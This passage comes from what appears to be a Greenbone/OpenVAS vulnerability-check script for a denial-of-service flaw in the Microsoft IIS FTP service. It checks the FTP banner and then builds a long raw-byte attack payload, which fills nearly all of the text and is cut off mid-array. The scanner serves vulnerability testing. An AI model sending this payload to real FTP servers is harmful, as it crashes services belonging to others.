script_name(\"Microsoft Windows IIS FTP Server DOS Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42713\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/842372\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/15803/\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1024921\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/3305\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\n\n## Get FTP Port\nftpPort = get_kb_item(\"Services/ftp\");\nif(!ftpPort){\n ftpPort = 21;\n}\n\n## Get Port Status\nif(!get_port_state(ftpPort)){\n exit(0);\n}\n\n## Confirm Application\nbanner = get_ftp_banner(port:ftpPort);\nif(\"Microsoft FTP Service\" >!< banner){\n exit(0);\n}\n\n## Build Exploit\nattack = raw_string(\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0x31, 0x34, 0x34, 0x39, 0x38, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 